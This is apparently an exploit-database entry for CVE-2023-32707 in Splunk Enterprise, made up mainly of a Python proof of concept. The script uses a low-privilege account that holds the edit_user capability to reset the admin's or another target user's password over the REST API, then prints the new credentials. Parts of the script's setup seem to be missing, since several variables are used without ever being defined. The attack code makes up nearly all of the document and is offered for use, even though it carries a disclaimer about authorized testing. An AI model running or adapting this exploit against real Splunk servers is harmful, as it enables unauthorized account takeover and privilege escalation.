Splunk Enterprise < 9.0.5 / 8.2.11 / 8.1.14 (CVE-2023-32707) admin account takeover via the `edit_user` capability — Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2023-10-09 |
Type : webapps |
Platform : multiple
This exploit / vulnerability (Splunk admin account takeover, CVE-2023-32707) is provided for educational purposes only; if you use it, you do so at your own risk and only against systems you are explicitly authorized to test.
# Vendor Description: A low-privilege user who holds a role that has the `edit_user` capability assigned
# to it can escalate their privileges to that of the admin user by providing specially crafted web requests.
#
# CVE: CVE-2023-32707. Versions Affected: Splunk Enterprise 9.0.0-9.0.4, 8.2.0-8.2.10 and 8.1.0-8.1.13
# (i.e. **below** 9.0.5, 8.2.11 and 8.1.14). The PoC needs valid credentials for a user whose role grants
# `edit_user`; it then resets the target user's password through the users REST endpoint.
#
import argparse
import base64
import random
import secrets
import string
import urllib.parse

import requests
import urllib3

# ignore warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
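# Inclusive [first, last] version ranges from the vendor advisory for CVE-2023-32707
# (8.1.0-8.1.13, 8.2.0-8.2.10, 9.0.0-9.0.4). Anything outside these ranges is treated
# as not affected unless the operator overrides the check (force_exploit).
AFFECTED_RANGES = (
    ((8, 1, 0), (8, 1, 13)),
    ((8, 2, 0), (8, 2, 10)),
    ((9, 0, 0), (9, 0, 4)),
)
# Same alphabet the PoC always used; characters are drawn with `secrets` rather than
# `random` so the password left on the hijacked account is not predictable from PRNG state.
PASSWORD_ALPHABET = string.ascii_letters + string.digits
PASSWORD_LENGTH = 16


def _parse_version(version: str) -> tuple[int, ...]:
    """Parse a dotted version string ('9.0.4') into a tuple of ints ((9, 0, 4)).

    Parsing stops at the first component that is not purely numeric, so
    '9.0.4-beta' yields (9, 0, 4) and 'unknown' yields ().
    """
    parts: list[int] = []
    for piece in str(version).split('.'):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    return tuple(parts)


def _is_affected(version: str) -> bool:
    """Return True when *version* falls inside one of AFFECTED_RANGES.

    Tuple comparison is numeric per component, unlike the string comparison
    this replaces (which ranked '9.0.10' below '9.0.4' and the fixed '8.2.11'
    below '9.0.4', i.e. reported patched builds as vulnerable). A version that
    cannot be parsed to at least three numeric components is reported as not
    affected; the operator can still override with force_exploit.
    """
    parsed = _parse_version(version)[:3]
    if len(parsed) < 3:
        return False
    return any(low <= parsed <= high for low, high in AFFECTED_RANGES)


if response.status_code == 200:
    # The user lookup response carries the server version under `generator.version`
    # and the authenticated user's capabilities in the first entry. A non-JSON or
    # differently shaped body (proxy error page, unexpected endpoint) must not crash
    # the script with a bare traceback.
    try:
        user = response.json()
        splunk_version = user['generator']['version']
        user_capabilities = user['entry'][0]['content']['capabilities']
    except (ValueError, KeyError, IndexError, TypeError) as exc:
        print(f"Unexpected response from Splunk server '{splunk_host}': {exc!r}")
        raise SystemExit(1)

    print(f"Detected Splunk version '{splunk_version}'")
    if _is_affected(splunk_version) or force_exploit:
        if 'edit_user' in user_capabilities:
            print(
                f"User '{splunk_username}' has the 'edit_user' capability, which would make this target exploitable.")
            new_password = ''.join(secrets.choice(PASSWORD_ALPHABET) for _ in range(PASSWORD_LENGTH))
            change_password_payload = {
                'password': new_password,
                'force-change-pass': 0,  # presumably: do not force a reset on next login
                'locked-out': 0,         # presumably: clear any lockout on the target
            }
            # The target username is path-quoted so a name with '/', '?' or '#' cannot
            # rewrite the request URL. verify=False is kept because self-signed certs
            # are the norm on Splunk management ports; a timeout stops a hung target
            # from blocking the run forever.
            response = requests.post(
                f"{user_endpoint}/{urllib.parse.quote(target_user, safe='')}?output_mode=json",
                data=change_password_payload,
                headers=headers,
                proxies=proxies,
                verify=False,
                timeout=30,
            )
            if response.status_code == 200:
                print(
                    f"Successfully taken over user '{target_user}', log into Splunk with the password '{new_password}'")
            else:
                # NOTE(review): on a patched server the caller may still hold edit_user
                # and be rejected here; the status/body lets the operator tell that
                # apart from a transport or payload problem.
                print('Account takeover failed')
                print(f"HTTP {response.status_code}: {response.text[:300]}")
        else:
            print(
                f"User '{splunk_username}' does not have the 'edit_user' capability, which makes this target not exploitable by this user.")
    else:
        print(f"Splunk version '{splunk_version}' is not affected by CVE-2023-32707")
else:
    # The password is deliberately not echoed: it would otherwise land in terminal
    # scrollback, CI logs or tool output captured during an engagement.
    print(
        f"Couldn't authenticate to Splunk server '{splunk_host}' with user '{splunk_username}' (HTTP {response.status_code})")
    raise SystemExit(1)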